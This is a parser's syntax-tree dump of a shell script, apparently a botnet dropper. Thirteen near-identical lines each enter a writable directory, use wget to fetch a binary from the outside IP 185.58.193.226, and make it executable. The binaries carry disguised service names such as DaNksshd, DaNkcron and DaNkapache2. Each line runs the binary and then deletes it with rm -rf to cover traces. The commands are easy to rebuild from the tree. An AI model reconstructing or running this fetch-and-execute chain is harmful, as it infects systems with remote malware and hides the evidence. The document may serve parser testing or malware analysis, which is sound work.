ListNode(lineno=2, pos=(12, 150), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 102), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 102), word='http://185.58.193.226/DaNkntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(102, 103)),
  CommandNode(lineno=2, pos=(104, 121), parts=[
    WordNode(lineno=2, pos=(104, 109), word='chmod'),
    WordNode(lineno=2, pos=(110, 112), word='+x'),
    WordNode(lineno=2, pos=(113, 121), word='DaNkntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(121, 122)),
  CommandNode(lineno=2, pos=(123, 133), parts=[
    WordNode(lineno=2, pos=(123, 133), word='./DaNkntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(133, 134)),
  CommandNode(lineno=2, pos=(135, 150), parts=[
    WordNode(lineno=2, pos=(135, 137), word='rm'),
    WordNode(lineno=2, pos=(138, 141), word='-rf'),
    WordNode(lineno=2, pos=(142, 150), word='DaNkntpd'),
  ]),
])
ListNode(lineno=3, pos=(151, 289), parts=[
  CommandNode(lineno=3, pos=(151, 158), parts=[
    WordNode(lineno=3, pos=(151, 153), word='cd'),
    WordNode(lineno=3, pos=(154, 158), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(159, 161)),
  CommandNode(lineno=3, pos=(162, 173), parts=[
    WordNode(lineno=3, pos=(162, 164), word='cd'),
    WordNode(lineno=3, pos=(165, 173), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(174, 176)),
  CommandNode(lineno=3, pos=(177, 184), parts=[
    WordNode(lineno=3, pos=(177, 179), word='cd'),
    WordNode(lineno=3, pos=(180, 184), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(185, 187)),
  CommandNode(lineno=3, pos=(188, 196), parts=[
    WordNode(lineno=3, pos=(188, 190), word='cd'),
    WordNode(lineno=3, pos=(191, 196), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(197, 199)),
  CommandNode(lineno=3, pos=(200, 204), parts=[
    WordNode(lineno=3, pos=(200, 202), word='cd'),
    WordNode(lineno=3, pos=(203, 204), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(204, 205)),
  CommandNode(lineno=3, pos=(206, 241), parts=[
    WordNode(lineno=3, pos=(206, 210), word='wget'),
    WordNode(lineno=3, pos=(211, 241), word='http://185.58.193.226/DaNksshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(241, 242)),
  CommandNode(lineno=3, pos=(243, 260), parts=[
    WordNode(lineno=3, pos=(243, 248), word='chmod'),
    WordNode(lineno=3, pos=(249, 251), word='+x'),
    WordNode(lineno=3, pos=(252, 260), word='DaNksshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(260, 261)),
  CommandNode(lineno=3, pos=(262, 272), parts=[
    WordNode(lineno=3, pos=(262, 272), word='./DaNksshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(272, 273)),
  CommandNode(lineno=3, pos=(274, 289), parts=[
    WordNode(lineno=3, pos=(274, 276), word='rm'),
    WordNode(lineno=3, pos=(277, 280), word='-rf'),
    WordNode(lineno=3, pos=(281, 289), word='DaNksshd'),
  ]),
])
ListNode(lineno=4, pos=(290, 440), parts=[
  CommandNode(lineno=4, pos=(290, 297), parts=[
    WordNode(lineno=4, pos=(290, 292), word='cd'),
    WordNode(lineno=4, pos=(293, 297), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(298, 300)),
  CommandNode(lineno=4, pos=(301, 312), parts=[
    WordNode(lineno=4, pos=(301, 303), word='cd'),
    WordNode(lineno=4, pos=(304, 312), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(313, 315)),
  CommandNode(lineno=4, pos=(316, 323), parts=[
    WordNode(lineno=4, pos=(316, 318), word='cd'),
    WordNode(lineno=4, pos=(319, 323), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(324, 326)),
  CommandNode(lineno=4, pos=(327, 335), parts=[
    WordNode(lineno=4, pos=(327, 329), word='cd'),
    WordNode(lineno=4, pos=(330, 335), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(336, 338)),
  CommandNode(lineno=4, pos=(339, 343), parts=[
    WordNode(lineno=4, pos=(339, 341), word='cd'),
    WordNode(lineno=4, pos=(342, 343), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(343, 344)),
  CommandNode(lineno=4, pos=(345, 383), parts=[
    WordNode(lineno=4, pos=(345, 349), word='wget'),
    WordNode(lineno=4, pos=(350, 383), word='http://185.58.193.226/DaNkopenssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(383, 384)),
  CommandNode(lineno=4, pos=(385, 405), parts=[
    WordNode(lineno=4, pos=(385, 390), word='chmod'),
    WordNode(lineno=4, pos=(391, 393), word='+x'),
    WordNode(lineno=4, pos=(394, 405), word='DaNkopenssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(405, 406)),
  CommandNode(lineno=4, pos=(407, 420), parts=[
    WordNode(lineno=4, pos=(407, 420), word='./DaNkopenssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(420, 421)),
  CommandNode(lineno=4, pos=(422, 440), parts=[
    WordNode(lineno=4, pos=(422, 424), word='rm'),
    WordNode(lineno=4, pos=(425, 428), word='-rf'),
    WordNode(lineno=4, pos=(429, 440), word='DaNkopenssh'),
  ]),
])
ListNode(lineno=5, pos=(441, 579), parts=[
  CommandNode(lineno=5, pos=(441, 448), parts=[
    WordNode(lineno=5, pos=(441, 443), word='cd'),
    WordNode(lineno=5, pos=(444, 448), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(449, 451)),
  CommandNode(lineno=5, pos=(452, 463), parts=[
    WordNode(lineno=5, pos=(452, 454), word='cd'),
    WordNode(lineno=5, pos=(455, 463), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(464, 466)),
  CommandNode(lineno=5, pos=(467, 474), parts=[
    WordNode(lineno=5, pos=(467, 469), word='cd'),
    WordNode(lineno=5, pos=(470, 474), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(475, 477)),
  CommandNode(lineno=5, pos=(478, 486), parts=[
    WordNode(lineno=5, pos=(478, 480), word='cd'),
    WordNode(lineno=5, pos=(481, 486), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(487, 489)),
  CommandNode(lineno=5, pos=(490, 494), parts=[
    WordNode(lineno=5, pos=(490, 492), word='cd'),
    WordNode(lineno=5, pos=(493, 494), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(494, 495)),
  CommandNode(lineno=5, pos=(496, 531), parts=[
    WordNode(lineno=5, pos=(496, 500), word='wget'),
    WordNode(lineno=5, pos=(501, 531), word='http://185.58.193.226/DaNkbash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(531, 532)),
  CommandNode(lineno=5, pos=(533, 550), parts=[
    WordNode(lineno=5, pos=(533, 538), word='chmod'),
    WordNode(lineno=5, pos=(539, 541), word='+x'),
    WordNode(lineno=5, pos=(542, 550), word='DaNkbash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(550, 551)),
  CommandNode(lineno=5, pos=(552, 562), parts=[
    WordNode(lineno=5, pos=(552, 562), word='./DaNkbash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(562, 563)),
  CommandNode(lineno=5, pos=(564, 579), parts=[
    WordNode(lineno=5, pos=(564, 566), word='rm'),
    WordNode(lineno=5, pos=(567, 570), word='-rf'),
    WordNode(lineno=5, pos=(571, 579), word='DaNkbash'),
  ]),
])
ListNode(lineno=6, pos=(580, 718), parts=[
  CommandNode(lineno=6, pos=(580, 587), parts=[
    WordNode(lineno=6, pos=(580, 582), word='cd'),
    WordNode(lineno=6, pos=(583, 587), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(588, 590)),
  CommandNode(lineno=6, pos=(591, 602), parts=[
    WordNode(lineno=6, pos=(591, 593), word='cd'),
    WordNode(lineno=6, pos=(594, 602), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(603, 605)),
  CommandNode(lineno=6, pos=(606, 613), parts=[
    WordNode(lineno=6, pos=(606, 608), word='cd'),
    WordNode(lineno=6, pos=(609, 613), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(614, 616)),
  CommandNode(lineno=6, pos=(617, 625), parts=[
    WordNode(lineno=6, pos=(617, 619), word='cd'),
    WordNode(lineno=6, pos=(620, 625), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(626, 628)),
  CommandNode(lineno=6, pos=(629, 633), parts=[
    WordNode(lineno=6, pos=(629, 631), word='cd'),
    WordNode(lineno=6, pos=(632, 633), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(633, 634)),
  CommandNode(lineno=6, pos=(635, 670), parts=[
    WordNode(lineno=6, pos=(635, 639), word='wget'),
    WordNode(lineno=6, pos=(640, 670), word='http://185.58.193.226/DaNktftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(670, 671)),
  CommandNode(lineno=6, pos=(672, 689), parts=[
    WordNode(lineno=6, pos=(672, 677), word='chmod'),
    WordNode(lineno=6, pos=(678, 680), word='+x'),
    WordNode(lineno=6, pos=(681, 689), word='DaNktftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(689, 690)),
  CommandNode(lineno=6, pos=(691, 701), parts=[
    WordNode(lineno=6, pos=(691, 701), word='./DaNktftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(701, 702)),
  CommandNode(lineno=6, pos=(703, 718), parts=[
    WordNode(lineno=6, pos=(703, 705), word='rm'),
    WordNode(lineno=6, pos=(706, 709), word='-rf'),
    WordNode(lineno=6, pos=(710, 718), word='DaNktftp'),
  ]),
])
ListNode(lineno=7, pos=(719, 857), parts=[
  CommandNode(lineno=7, pos=(719, 726), parts=[
    WordNode(lineno=7, pos=(719, 721), word='cd'),
    WordNode(lineno=7, pos=(722, 726), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(727, 729)),
  CommandNode(lineno=7, pos=(730, 741), parts=[
    WordNode(lineno=7, pos=(730, 732), word='cd'),
    WordNode(lineno=7, pos=(733, 741), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(742, 744)),
  CommandNode(lineno=7, pos=(745, 752), parts=[
    WordNode(lineno=7, pos=(745, 747), word='cd'),
    WordNode(lineno=7, pos=(748, 752), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(753, 755)),
  CommandNode(lineno=7, pos=(756, 764), parts=[
    WordNode(lineno=7, pos=(756, 758), word='cd'),
    WordNode(lineno=7, pos=(759, 764), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(765, 767)),
  CommandNode(lineno=7, pos=(768, 772), parts=[
    WordNode(lineno=7, pos=(768, 770), word='cd'),
    WordNode(lineno=7, pos=(771, 772), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(772, 773)),
  CommandNode(lineno=7, pos=(774, 809), parts=[
    WordNode(lineno=7, pos=(774, 778), word='wget'),
    WordNode(lineno=7, pos=(779, 809), word='http://185.58.193.226/DaNkwget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(809, 810)),
  CommandNode(lineno=7, pos=(811, 828), parts=[
    WordNode(lineno=7, pos=(811, 816), word='chmod'),
    WordNode(lineno=7, pos=(817, 819), word='+x'),
    WordNode(lineno=7, pos=(820, 828), word='DaNkwget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(828, 829)),
  CommandNode(lineno=7, pos=(830, 840), parts=[
    WordNode(lineno=7, pos=(830, 840), word='./DaNkwget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(840, 841)),
  CommandNode(lineno=7, pos=(842, 857), parts=[
    WordNode(lineno=7, pos=(842, 844), word='rm'),
    WordNode(lineno=7, pos=(845, 848), word='-rf'),
    WordNode(lineno=7, pos=(849, 857), word='DaNkwget'),
  ]),
])
ListNode(lineno=8, pos=(858, 996), parts=[
  CommandNode(lineno=8, pos=(858, 865), parts=[
    WordNode(lineno=8, pos=(858, 860), word='cd'),
    WordNode(lineno=8, pos=(861, 865), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(866, 868)),
  CommandNode(lineno=8, pos=(869, 880), parts=[
    WordNode(lineno=8, pos=(869, 871), word='cd'),
    WordNode(lineno=8, pos=(872, 880), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(881, 883)),
  CommandNode(lineno=8, pos=(884, 891), parts=[
    WordNode(lineno=8, pos=(884, 886), word='cd'),
    WordNode(lineno=8, pos=(887, 891), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(892, 894)),
  CommandNode(lineno=8, pos=(895, 903), parts=[
    WordNode(lineno=8, pos=(895, 897), word='cd'),
    WordNode(lineno=8, pos=(898, 903), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(904, 906)),
  CommandNode(lineno=8, pos=(907, 911), parts=[
    WordNode(lineno=8, pos=(907, 909), word='cd'),
    WordNode(lineno=8, pos=(910, 911), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(911, 912)),
  CommandNode(lineno=8, pos=(913, 948), parts=[
    WordNode(lineno=8, pos=(913, 917), word='wget'),
    WordNode(lineno=8, pos=(918, 948), word='http://185.58.193.226/DaNkcron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(948, 949)),
  CommandNode(lineno=8, pos=(950, 967), parts=[
    WordNode(lineno=8, pos=(950, 955), word='chmod'),
    WordNode(lineno=8, pos=(956, 958), word='+x'),
    WordNode(lineno=8, pos=(959, 967), word='DaNkcron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(967, 968)),
  CommandNode(lineno=8, pos=(969, 979), parts=[
    WordNode(lineno=8, pos=(969, 979), word='./DaNkcron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(979, 980)),
  CommandNode(lineno=8, pos=(981, 996), parts=[
    WordNode(lineno=8, pos=(981, 983), word='rm'),
    WordNode(lineno=8, pos=(984, 987), word='-rf'),
    WordNode(lineno=8, pos=(988, 996), word='DaNkcron'),
  ]),
])
ListNode(lineno=9, pos=(997, 1131), parts=[
  CommandNode(lineno=9, pos=(997, 1004), parts=[
    WordNode(lineno=9, pos=(997, 999), word='cd'),
    WordNode(lineno=9, pos=(1000, 1004), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1005, 1007)),
  CommandNode(lineno=9, pos=(1008, 1019), parts=[
    WordNode(lineno=9, pos=(1008, 1010), word='cd'),
    WordNode(lineno=9, pos=(1011, 1019), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1020, 1022)),
  CommandNode(lineno=9, pos=(1023, 1030), parts=[
    WordNode(lineno=9, pos=(1023, 1025), word='cd'),
    WordNode(lineno=9, pos=(1026, 1030), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1031, 1033)),
  CommandNode(lineno=9, pos=(1034, 1042), parts=[
    WordNode(lineno=9, pos=(1034, 1036), word='cd'),
    WordNode(lineno=9, pos=(1037, 1042), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1043, 1045)),
  CommandNode(lineno=9, pos=(1046, 1050), parts=[
    WordNode(lineno=9, pos=(1046, 1048), word='cd'),
    WordNode(lineno=9, pos=(1049, 1050), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1050, 1051)),
  CommandNode(lineno=9, pos=(1052, 1086), parts=[
    WordNode(lineno=9, pos=(1052, 1056), word='wget'),
    WordNode(lineno=9, pos=(1057, 1086), word='http://185.58.193.226/DaNkftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1086, 1087)),
  CommandNode(lineno=9, pos=(1088, 1104), parts=[
    WordNode(lineno=9, pos=(1088, 1093), word='chmod'),
    WordNode(lineno=9, pos=(1094, 1096), word='+x'),
    WordNode(lineno=9, pos=(1097, 1104), word='DaNkftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1104, 1105)),
  CommandNode(lineno=9, pos=(1106, 1115), parts=[
    WordNode(lineno=9, pos=(1106, 1115), word='./DaNkftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1115, 1116)),
  CommandNode(lineno=9, pos=(1117, 1131), parts=[
    WordNode(lineno=9, pos=(1117, 1119), word='rm'),
    WordNode(lineno=9, pos=(1120, 1123), word='-rf'),
    WordNode(lineno=9, pos=(1124, 1131), word='DaNkftp'),
  ]),
])
ListNode(lineno=10, pos=(1132, 1270), parts=[
  CommandNode(lineno=10, pos=(1132, 1139), parts=[
    WordNode(lineno=10, pos=(1132, 1134), word='cd'),
    WordNode(lineno=10, pos=(1135, 1139), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1140, 1142)),
  CommandNode(lineno=10, pos=(1143, 1154), parts=[
    WordNode(lineno=10, pos=(1143, 1145), word='cd'),
    WordNode(lineno=10, pos=(1146, 1154), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1155, 1157)),
  CommandNode(lineno=10, pos=(1158, 1165), parts=[
    WordNode(lineno=10, pos=(1158, 1160), word='cd'),
    WordNode(lineno=10, pos=(1161, 1165), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1166, 1168)),
  CommandNode(lineno=10, pos=(1169, 1177), parts=[
    WordNode(lineno=10, pos=(1169, 1171), word='cd'),
    WordNode(lineno=10, pos=(1172, 1177), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1178, 1180)),
  CommandNode(lineno=10, pos=(1181, 1185), parts=[
    WordNode(lineno=10, pos=(1181, 1183), word='cd'),
    WordNode(lineno=10, pos=(1184, 1185), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1185, 1186)),
  CommandNode(lineno=10, pos=(1187, 1222), parts=[
    WordNode(lineno=10, pos=(1187, 1191), word='wget'),
    WordNode(lineno=10, pos=(1192, 1222), word='http://185.58.193.226/DaNkpftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1222, 1223)),
  CommandNode(lineno=10, pos=(1224, 1241), parts=[
    WordNode(lineno=10, pos=(1224, 1229), word='chmod'),
    WordNode(lineno=10, pos=(1230, 1232), word='+x'),
    WordNode(lineno=10, pos=(1233, 1241), word='DaNkpftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1241, 1242)),
  CommandNode(lineno=10, pos=(1243, 1253), parts=[
    WordNode(lineno=10, pos=(1243, 1253), word='./DaNkpftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1253, 1254)),
  CommandNode(lineno=10, pos=(1255, 1270), parts=[
    WordNode(lineno=10, pos=(1255, 1257), word='rm'),
    WordNode(lineno=10, pos=(1258, 1261), word='-rf'),
    WordNode(lineno=10, pos=(1262, 1270), word='DaNkpftp'),
  ]),
])
ListNode(lineno=11, pos=(1271, 1401), parts=[
  CommandNode(lineno=11, pos=(1271, 1278), parts=[
    WordNode(lineno=11, pos=(1271, 1273), word='cd'),
    WordNode(lineno=11, pos=(1274, 1278), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1279, 1281)),
  CommandNode(lineno=11, pos=(1282, 1293), parts=[
    WordNode(lineno=11, pos=(1282, 1284), word='cd'),
    WordNode(lineno=11, pos=(1285, 1293), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1294, 1296)),
  CommandNode(lineno=11, pos=(1297, 1304), parts=[
    WordNode(lineno=11, pos=(1297, 1299), word='cd'),
    WordNode(lineno=11, pos=(1300, 1304), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1305, 1307)),
  CommandNode(lineno=11, pos=(1308, 1316), parts=[
    WordNode(lineno=11, pos=(1308, 1310), word='cd'),
    WordNode(lineno=11, pos=(1311, 1316), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1317, 1319)),
  CommandNode(lineno=11, pos=(1320, 1324), parts=[
    WordNode(lineno=11, pos=(1320, 1322), word='cd'),
    WordNode(lineno=11, pos=(1323, 1324), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1324, 1325)),
  CommandNode(lineno=11, pos=(1326, 1359), parts=[
    WordNode(lineno=11, pos=(1326, 1330), word='wget'),
    WordNode(lineno=11, pos=(1331, 1359), word='http://185.58.193.226/DaNksh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1359, 1360)),
  CommandNode(lineno=11, pos=(1361, 1376), parts=[
    WordNode(lineno=11, pos=(1361, 1366), word='chmod'),
    WordNode(lineno=11, pos=(1367, 1369), word='+x'),
    WordNode(lineno=11, pos=(1370, 1376), word='DaNksh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1376, 1377)),
  CommandNode(lineno=11, pos=(1378, 1386), parts=[
    WordNode(lineno=11, pos=(1378, 1386), word='./DaNksh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1386, 1387)),
  CommandNode(lineno=11, pos=(1388, 1401), parts=[
    WordNode(lineno=11, pos=(1388, 1390), word='rm'),
    WordNode(lineno=11, pos=(1391, 1394), word='-rf'),
    WordNode(lineno=11, pos=(1395, 1401), word='DaNksh'),
  ]),
])
ListNode(lineno=12, pos=(1402, 1540), parts=[
  CommandNode(lineno=12, pos=(1402, 1409), parts=[
    WordNode(lineno=12, pos=(1402, 1404), word='cd'),
    WordNode(lineno=12, pos=(1405, 1409), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1410, 1412)),
  CommandNode(lineno=12, pos=(1413, 1424), parts=[
    WordNode(lineno=12, pos=(1413, 1415), word='cd'),
    WordNode(lineno=12, pos=(1416, 1424), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1425, 1427)),
  CommandNode(lineno=12, pos=(1428, 1435), parts=[
    WordNode(lineno=12, pos=(1428, 1430), word='cd'),
    WordNode(lineno=12, pos=(1431, 1435), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1436, 1438)),
  CommandNode(lineno=12, pos=(1439, 1447), parts=[
    WordNode(lineno=12, pos=(1439, 1441), word='cd'),
    WordNode(lineno=12, pos=(1442, 1447), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1448, 1450)),
  CommandNode(lineno=12, pos=(1451, 1455), parts=[
    WordNode(lineno=12, pos=(1451, 1453), word='cd'),
    WordNode(lineno=12, pos=(1454, 1455), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1455, 1456)),
  CommandNode(lineno=12, pos=(1457, 1492), parts=[
    WordNode(lineno=12, pos=(1457, 1461), word='wget'),
    WordNode(lineno=12, pos=(1462, 1492), word='http://185.58.193.226/DaNkshit'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1492, 1493)),
  CommandNode(lineno=12, pos=(1494, 1511), parts=[
    WordNode(lineno=12, pos=(1494, 1499), word='chmod'),
    WordNode(lineno=12, pos=(1500, 1502), word='+x'),
    WordNode(lineno=12, pos=(1503, 1511), word='DaNkshit'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1511, 1512)),
  CommandNode(lineno=12, pos=(1513, 1523), parts=[
    WordNode(lineno=12, pos=(1513, 1523), word='./DaNkshit'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1523, 1524)),
  CommandNode(lineno=12, pos=(1525, 1540), parts=[
    WordNode(lineno=12, pos=(1525, 1527), word='rm'),
    WordNode(lineno=12, pos=(1528, 1531), word='-rf'),
    WordNode(lineno=12, pos=(1532, 1540), word='DaNkshit'),
  ]),
])
ListNode(lineno=13, pos=(1541, 1691), parts=[
  CommandNode(lineno=13, pos=(1541, 1548), parts=[
    WordNode(lineno=13, pos=(1541, 1543), word='cd'),
    WordNode(lineno=13, pos=(1544, 1548), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1549, 1551)),
  CommandNode(lineno=13, pos=(1552, 1563), parts=[
    WordNode(lineno=13, pos=(1552, 1554), word='cd'),
    WordNode(lineno=13, pos=(1555, 1563), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1564, 1566)),
  CommandNode(lineno=13, pos=(1567, 1574), parts=[
    WordNode(lineno=13, pos=(1567, 1569), word='cd'),
    WordNode(lineno=13, pos=(1570, 1574), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1575, 1577)),
  CommandNode(lineno=13, pos=(1578, 1586), parts=[
    WordNode(lineno=13, pos=(1578, 1580), word='cd'),
    WordNode(lineno=13, pos=(1581, 1586), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1587, 1589)),
  CommandNode(lineno=13, pos=(1590, 1594), parts=[
    WordNode(lineno=13, pos=(1590, 1592), word='cd'),
    WordNode(lineno=13, pos=(1593, 1594), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1594, 1595)),
  CommandNode(lineno=13, pos=(1596, 1634), parts=[
    WordNode(lineno=13, pos=(1596, 1600), word='wget'),
    WordNode(lineno=13, pos=(1601, 1634), word='http://185.58.193.226/DaNkapache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1634, 1635)),
  CommandNode(lineno=13, pos=(1636, 1656), parts=[
    WordNode(lineno=13, pos=(1636, 1641), word='chmod'),
    WordNode(lineno=13, pos=(1642, 1644), word='+x'),
    WordNode(lineno=13, pos=(1645, 1656), word='DaNkapache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1656, 1657)),
  CommandNode(lineno=13, pos=(1658, 1671), parts=[
    WordNode(lineno=13, pos=(1658, 1671), word='./DaNkapache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1671, 1672)),
  CommandNode(lineno=13, pos=(1673, 1691), parts=[
    WordNode(lineno=13, pos=(1673, 1675), word='rm'),
    WordNode(lineno=13, pos=(1676, 1679), word='-rf'),
    WordNode(lineno=13, pos=(1680, 1691), word='DaNkapache2'),
  ]),
])
ListNode(lineno=14, pos=(1692, 1842), parts=[
  CommandNode(lineno=14, pos=(1692, 1699), parts=[
    WordNode(lineno=14, pos=(1692, 1694), word='cd'),
    WordNode(lineno=14, pos=(1695, 1699), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1700, 1702)),
  CommandNode(lineno=14, pos=(1703, 1714), parts=[
    WordNode(lineno=14, pos=(1703, 1705), word='cd'),
    WordNode(lineno=14, pos=(1706, 1714), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1715, 1717)),
  CommandNode(lineno=14, pos=(1718, 1725), parts=[
    WordNode(lineno=14, pos=(1718, 1720), word='cd'),
    WordNode(lineno=14, pos=(1721, 1725), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1726, 1728)),
  CommandNode(lineno=14, pos=(1729, 1737), parts=[
    WordNode(lineno=14, pos=(1729, 1731), word='cd'),
    WordNode(lineno=14, pos=(1732, 1737), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1738, 1740)),
  CommandNode(lineno=14, pos=(1741, 1745), parts=[
    WordNode(lineno=14, pos=(1741, 1743), word='cd'),
    WordNode(lineno=14, pos=(1744, 1745), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1745, 1746)),
  CommandNode(lineno=14, pos=(1747, 1785), parts=[
    WordNode(lineno=14, pos=(1747, 1751), word='wget'),
    WordNode(lineno=14, pos=(1752, 1785), word='http://185.58.193.226/DaNktelnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1785, 1786)),
  CommandNode(lineno=14, pos=(1787, 1807), parts=[
    WordNode(lineno=14, pos=(1787, 1792), word='chmod'),
    WordNode(lineno=14, pos=(1793, 1795), word='+x'),
    WordNode(lineno=14, pos=(1796, 1807), word='DaNktelnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1807, 1808)),
  CommandNode(lineno=14, pos=(1809, 1822), parts=[
    WordNode(lineno=14, pos=(1809, 1822), word='./DaNktelnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1822, 1823)),
  CommandNode(lineno=14, pos=(1824, 1842), parts=[
    WordNode(lineno=14, pos=(1824, 1826), word='rm'),
    WordNode(lineno=14, pos=(1827, 1830), word='-rf'),
    WordNode(lineno=14, pos=(1831, 1842), word='DaNktelnetd'),
  ]),
])
